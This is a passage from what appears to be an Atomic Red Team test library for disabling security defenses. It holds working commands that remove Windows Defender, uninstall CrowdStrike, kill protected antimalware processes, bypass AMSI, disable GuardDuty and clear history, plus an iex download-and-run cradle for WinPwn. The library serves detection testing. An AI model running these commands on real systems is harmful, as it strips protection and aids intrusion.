On later viersions of windows (1909+) this command fails even with admin due to inusfficient privelages. On older versions of windows the
command will say completed.
https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
**Supported Platforms:** Windows
**auto_generated_guid:** `3d47daaa-2f56-43e0-94cc-caf5d8d52a68`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
### Atomic Test #24: Stop and Remove Arbitrary Security Windows Service
Beginning with Powershell 6.0, the Stop-Service cmdlet sends a stop message to the Windows Service Controller for each of the specified services. The Remove-Service cmdlet removes a Windows service in the registry and in the service database.
**Supported Platforms:** Windows
**auto_generated_guid:** `ae753dda-0f15-4af6-a168-b9ba16143143`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to remove | string | McAfeeDLPAgentService|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Stop-Service -Name #{service_name}
Remove-Service -Name #{service_name}
```
### Atomic Test #25: Uninstall Crowdstrike Falcon on Windows
Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is not provided as an argument we need to search for it. Since the executable is located in a folder named with a random guid we need to identify it before invoking the uninstaller.
**Supported Platforms:** Windows
**auto_generated_guid:** `b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:&#92;ProgramData&#92;Package Cache&#92;{7489ba93-b668-447f-8401-7e57a6fe538d}&#92;WindowsSensor.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}}
```
### Atomic Test #26: Tamper with Windows Defender Evade Scanning -Folder
Malware can exclude a specific path from being scanned and evading detection.
Upon successul execution, the file provided should be on the list of excluded path.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
**Supported Platforms:** Windows
**auto_generated_guid:** `0b19f4ee-de90-4059-88cb-63c800c683ed`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_folder | This folder will be excluded from scanning | path | C:&#92;Temp|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$excludedpath= "#{excluded_folder}"
Add-MpPreference -ExclusionPath $excludedpath
```
#### Cleanup Commands
```powershell
$excludedpath= "#{excluded_folder}"
Remove-MpPreference -ExclusionPath $excludedpath
```
### Atomic Test #27: Tamper with Windows Defender Evade Scanning -Extension
Malware can exclude specific extensions from being scanned and evading detection.
Upon successful execution, the extension(s) should be on the list of excluded extensions.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionExtension.
**Supported Platforms:** Windows
**auto_generated_guid:** `315f4be6-2240-4552-b3e1-d1047f5eecea`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_exts | A list of extension to exclude from scanning | string | .exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$excludedExts= "#{excluded_exts}"
Add-MpPreference -ExclusionExtension $excludedExts
```
#### Cleanup Commands
```powershell
$excludedExts= "#{excluded_exts}"
Remove-MpPreference -ExclusionExtension $excludedExts -ErrorAction Ignore
```
### Atomic Test #28: Tamper with Windows Defender Evade Scanning -Process
Malware can exclude specific processes from being scanned and evading detection.
Upon successful execution, the process(es) should be on the list of excluded processes.
To check the exclusion list using poweshell (Get-MpPreference).ExclusionProcess."
**Supported Platforms:** Windows
**auto_generated_guid:** `a123ce6a-3916-45d6-ba9c-7d4081315c27`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| excluded_process | A list of processes to exclude from scanning | string | outlook.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$excludedProcess = "#{excluded_process}"
Add-MpPreference -ExclusionProcess $excludedProcess
```
#### Cleanup Commands
```powershell
$excludedProcess = "#{excluded_process}"
Remove-MpPreference -ExclusionProcess $excludedProcess
```
### Atomic Test #29: office-365-Disable-AntiPhishRule
Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
**Supported Platforms:** Office-365
**auto_generated_guid:** `b9bbae2c-2ba6-4cf3-b452-8e8f908696f3`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | office-365 username | string | |
| password | office-365 password | string | |
#### Attack Commands: Run with `powershell`!
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
```
#### Cleanup Commands
```powershell
if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
}
```
#### Dependencies: Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed
###### Check Prereq Commands
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
```
###### Get Prereq Commands
```powershell
Install-Module -Name ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
```
### Atomic Test #30: Disable Windows Defender with DISM
The following Atomic will attempt to disable Windows-Defender using the built in DISM.exe, Deployment Image Servicing and Management tool.
DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's package.
**Supported Platforms:** Windows
**auto_generated_guid:** `871438ac-7d6e-432a-b27d-3e7db69faf58`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
```
### Atomic Test #31: Disable Defender Using NirSoft AdvancedRun
Information on NirSoft AdvancedRun and its creators found here: http://www.nirsoft.net/utils/advanced_run.html
This Atomic will run AdvancedRun.exe with similar behavior identified during the WhisperGate campaign.
See https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3
Upon successful execution, AdvancedRun.exe will attempt to run and stop Defender, and optionally attempt to delete the Defender folder on disk.
**Supported Platforms:** Windows
**auto_generated_guid:** `81ce22fd-9612-4154-918e-8a1f285d214d`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| AdvancedRun_Location | Path of Advanced Run executable | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;AdvancedRun.exe|
| delete_defender_folder | Set to 1 to also delete the Windows Defender folder | integer | 0|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
if(#{delete_defender_folder}){
$CommandToRun = rmdir "$env:programdata\Microsoft\Windows Defender" -Recurse
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\WindowsPowershell\v1.0\powershell.exe" /WindowState 0 /CommandLine "$CommandToRun" /StartDirectory "" /RunAs 8 /Run} Catch{}
}
```
#### Cleanup Commands
```powershell
Try {cmd /c "#{AdvancedRun_Location}" /EXEFilename "$env:systemroot\System32\sc.exe" /WindowState 0 /CommandLine "start WinDefend" /StartDirectory "" /RunAs 8 /Run} Catch{}
```
#### Dependencies: Run with `powershell`!
##### Description: Advancedrun.exe must exist at #{AdvancedRun_Location}
###### Check Prereq Commands
```powershell
if(Test-Path -Path "#{AdvancedRun_Location}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip"
Expand-Archive -path "PathToAtomicsFolder\..\ExternalPayloads\advancedrun.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\" -Force
```
### Atomic Test #32: Kill antimalware protected processes using Backstab
Backstab loads Process Explorer driver which is signed by Microsoft and use it to terminate running processes protected by antimalware software such as MsSense.exe or MsMpEng.exe, which is otherwise not possible to kill.
https://github.com/Yaxser/Backstab
**Supported Platforms:** Windows
**auto_generated_guid:** `24a12b91-05a7-4deb-8d7f-035fa98591bc`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| process_name | Name of the protected process you want to kill/terminate. | string | MsMpEng.exe|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe" -k -n #{process_name}
```
#### Dependencies: Run with `powershell`!
##### Description: Backstab64.exe should exist in ExtrnalPayloads Directory
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/Yaxser/Backstab/releases/download/v1.0.1-beta/Backstab64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\Backstab64.exe"
```
### Atomic Test #33: WinPwn - Kill the event log services for stealth
Kill the event log services for stealth via function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** `7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66`
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
inv-phantom -consoleoutput -noninteractive
```
### Atomic Test #34: Tamper with Windows Defender ATP using Aliases - PowerShell
Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
in Windows settings.
**Supported Platforms:** Windows
**auto_generated_guid:** `c531aa6e-9c97-4b29-afee-9b7be6fc8a64`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Set-MpPreference -drtm $True
Set-MpPreference -dbm $True
Set-MpPreference -dscrptsc $True
Set-MpPreference -dbaf $True
```
#### Cleanup Commands
```powershell
Set-MpPreference -drtm 0
Set-MpPreference -dbm 0
Set-MpPreference -dscrptsc 0
Set-MpPreference -dbaf 0
```
### Atomic Test #35: LockBit Black - Disable Privacy Settings Experience Using Registry -cmd
LockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** Windows
**auto_generated_guid:** `d6d22332-d07d-498f-aea0-6139ecb7850e`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f
```
#### Cleanup Commands
```cmd
reg delete "HKCU\Software\Policies\Microsoft\Windows\OOBE" /v DisablePrivacyExperience /f >nul 2>&1
```
### Atomic Test #36: LockBit Black - Use Registry Editor to turn on automatic logon -cmd
LockBit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** Windows
**auto_generated_guid:** `9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_DWORD /d 1 /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Administrator /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /t REG_SZ /d contoso.com /f
reg add "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d password1 /f
```
#### Cleanup Commands
```cmd
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName /f >nul 2>&1
reg delete "HKLM\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /f >nul 2>&1
```
### Atomic Test #37: LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell
LockBit Black - Disable Privacy Settings Experience Using Registry
**Supported Platforms:** Windows
**auto_generated_guid:** `d8c57eaa-497a-4a08-961e-bd5efd7c9374`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -PropertyType DWord -Value 1 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKCU:\Software\Policies\Microsoft\Windows\OOBE" -Name DisablePrivacyExperience -Force -ErrorAction Ignore
```
### Atomic Test #38: Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell
Lockbit Black - Use Registry Editor to turn on automatic logon
**Supported Platforms:** Windows
**auto_generated_guid:** `5e27f36d-5132-4537-b43b-413b0d5eec9a`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -PropertyType DWord -Value 1 -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Value Administrator -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Value contoso.com -Force
New-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Value password1 -Force
```
#### Cleanup Commands
```powershell
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name AutoAdminLogon -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultDomainName -Force -ErrorAction Ignore
Remove-ItemProperty "HKLM:\Software\Policies\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -Force -ErrorAction Ignore
```
### Atomic Test #39: Disable Windows Defender with PwSh Disable-WindowsOptionalFeature
The following Atomic will attempt to disable Windows-Defender using the built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool.
Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images.
A successful execution will not standard-out any details. Remove the quiet switch if verbosity is needed.
This method will remove Defender and it's packages.
Reference: https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps
**Supported Platforms:** Windows
**auto_generated_guid:** `f542ffd3-37b4-4528-837f-682874faa012`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Gui" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-Features" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender" -NoRestart -ErrorAction Ignore
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
```
### Atomic Test #40: WMIC Tamper with Windows Defender Evade Scanning Folder
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
**Supported Platforms:** Windows
**auto_generated_guid:** `59d386fc-3a4b-41b8-850d-9e3eee24dfe4`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Add ExclusionPath=\"ATOMICREDTEAM\"
```
#### Cleanup Commands
```cmd
wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
```
### Atomic Test #41: Delete Windows Defender Scheduled Tasks
The following atomic test will delete the Windows Defender scheduled tasks.
[Reference](https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/)
**Supported Platforms:** Windows
**auto_generated_guid:** `4b841aa1-0d05-4b32-bbe7-7564346e7c76`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f )
IF EXIST "%temp%\Windows_Defender_Cleanup.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f )
IF EXIST "%temp%\Windows_Defender_Verification.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f )
IF EXIST "%temp%\Windows_Defender_Cache_Maintenance.xml" ( schtasks /delete /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f )
```
#### Cleanup Commands
```cmd
schtasks /create /xml "%temp%\Windows_Defender_Scheduled_Scan.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
schtasks /create /xml "%temp%\Windows_Defender_Cleanup.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
schtasks /create /xml "%temp%\Windows_Defender_Verification.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
```
#### Dependencies: Run with `command_prompt`!
##### Description: The Windows Defender scheduled tasks must be backed up first
###### Check Prereq Commands
```cmd
IF EXIST "%temp%\Windows_Defender_Scheduled_Scan.xml" ( EXIT 0 ) ELSE ( EXIT 1 )
```
###### Get Prereq Commands
```cmd
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" > "%temp%\Windows_Defender_Scheduled_Scan.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cleanup" > "%temp%\Windows_Defender_Cleanup.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Verification" > "%temp%\Windows_Defender_Verification.xml"
schtasks /query /xml /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" > "%temp%\Windows_Defender_Cache_Maintenance.xml"
```
### Atomic Test #42: Clear History
Clear Shell History. This technique only affect the bash shell application.
**Supported Platforms:** Linux
**auto_generated_guid:** `23b88394-091b-4968-a42d-fb8076992443`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
history -c
```
### Atomic Test #43: Suspend History
suspend Shell History seen in Awfulshred wiper- https://unix.stackexchange.com/questions/10922/temporarily-suspend-bash-history-on-a-given-shell
**Supported Platforms:** Linux
**auto_generated_guid:** `94f6a1c9-aae7-46a4-9083-2bb1f5768ec4`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
set +o history
```
#### Cleanup Commands
```sh
set -o history
```
### Atomic Test #44: Reboot Linux Host via Kernel System Request
reboot system via system request seen in Awfulshred wiper.
**Supported Platforms:** Linux
**auto_generated_guid:** `6d6d3154-1a52-4d1a-9d51-92ab8148b32e`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
echo 1> /proc/sys/kernel/sysrq
echo b> /proc/sysrq-trigger
```
### Atomic Test #45: Clear Pagging Cache
clear pagging cache via system request. This is a temporary change in the system to clear paging cache. This technique seen in Awfulshred wiper as part
of its malicious payload on the compromised host. added reference link for this technique: https://www.tecmint.com/clear-ram-memory-cache-buffer-and-swap-space-on-linux/
**Supported Platforms:** Linux
**auto_generated_guid:** `f790927b-ea85-4a16-b7b2-7eb44176a510`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
free && echo 3 > /proc/sys/vm/drop_caches && free
echo 3> /proc/sys/vm/drop_caches
```
### Atomic Test #46: Disable Memory Swap
disable swapping of device paging that impaire the compromised host to swap data if the RAM is full. Awfulshred wiper used this technique as an additional
payload to the compromised host and to make sure that there will be no recoverable data due to swap feature of FreeBSD/linux.
**Supported Platforms:** Linux
**auto_generated_guid:** `e74e4c63-6fde-4ad2-9ee8-21c3a1733114`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
swapon -a
sleep 2
swapoff -a
sync
```
#### Cleanup Commands
```sh
swapon -a
sleep 2
sync
```
### Atomic Test #47: Disable Hypervisor-Enforced Code Integrity (HVCI)
This test disables Hypervisor-Enforced Code Integrity (HVCI) by setting the registry key HKLM:\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity "Enabled" value to "0".
The pre-req needs to be ran in order to setup HVCI and have it enabled.
We do not recommend running this in production.
[Black Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)
[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)
**Supported Platforms:** Windows
**auto_generated_guid:** `70bd71e6-eba4-4e00-92f7-617911dbe020`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
```
#### Cleanup Commands
```powershell
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
```
#### Dependencies: Run with `powershell`!
##### Description: HVCI must be enabled
###### Check Prereq Commands
```powershell
if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1 }
```
###### Get Prereq Commands
```powershell
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
```
### Atomic Test #48: AMSI Bypass - Override AMSI via COM
With administrative rights, an adversary can disable AMSI via registry value in HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} by overriding the Microsoft Defender COM object for AMSI and points it to a DLL that does not exist.
This is currently being used by AsyncRAT and others.
https://strontic.github.io/xcyclopedia/library/clsid_fdb00e52-a214-4aa1-8fba-4357bb0072ec.html
https://securitynews.sonicwall.com/xmlpost/asyncrat-variant-includes-cryptostealer-capabilites/
**Supported Platforms:** Windows
**auto_generated_guid:** `17538258-5699-4ff1-92d1-5ac9b0dc21f5`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
```
#### Cleanup Commands
```cmd
REG DELETE HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /f
```
### Atomic Test #49: AWS - GuardDuty Suspension or Deletion
Enables GuardDuty in AWS, upon successful creation this test will suspend and then delete the GuardDuty configuration.
**Supported Platforms:** Iaas:aws
**auto_generated_guid:** `11e65d8d-e7e4-470e-a3ff-82bc56ad938e`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| region | Name of the specified region | string | us-east-1|
#### Attack Commands: Run with `bash`!
```bash
detectorId=$(aws guardduty create-detector --enable --region "#{region}" | grep -oP '(?<="DetectorId": ")[^"]*')
aws guardduty update-detector --no-enable --detector-id $detectorId
aws guardduty delete-detector --detector-id $detectorId
```
#### Cleanup Commands
```bash
echo "If test successfully ran, no cleanup required."
```
#### Dependencies: Run with `bash`!
##### Description: Check if ~/.aws/credentials file has a default stanza is configured
###### Check Prereq Commands
```bash
cat ~/.aws/credentials | grep "default"
```
###### Get Prereq Commands
```bash
echo "Please install the aws-cli and configure your AWS default profile using: aws configure"
```
### Atomic Test #50x: Tamper with Defender ATP on Linux/MacOS
With root privileges, an adversary can disable real time protection. Note, this test assumes Defender is not in passive mode and real-time protection is enabled. The use of a managed.json on Linux or Defender .plist on MacOS will prevent these changes. Tamper protection will also prevent this (available on MacOS, but not Linux at the time of writing). Installation of MDATP is a prerequisite. Installation steps vary across MacOS and Linux distros. See Microsoft public documentation for instructions: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/mac-install-manually?view=o365-worldwide https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/linux-install-manually?view=o365-worldwide
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** `40074085-dbc8-492b-90a3-11bcfc52fda8`
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
sudo mdatp config real-time-protection --value disabled
```
#### Cleanup Commands
```sh
sudo mdatp config real-time-protection --value enabled
```
### Atomic Test #51: Tamper with Windows Defender Registry - Reg.exe
Disable Windows Defender by tampering with windows defender registry using the utility "reg.exe"
**Supported Platforms:** Windows
**auto_generated_guid:** `1f6743da-6ecc-4a93-b03f-dc357e4b313f`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIntrusionPreventionSystem" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f >NUL 2>nul
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f >NUL 2>nul
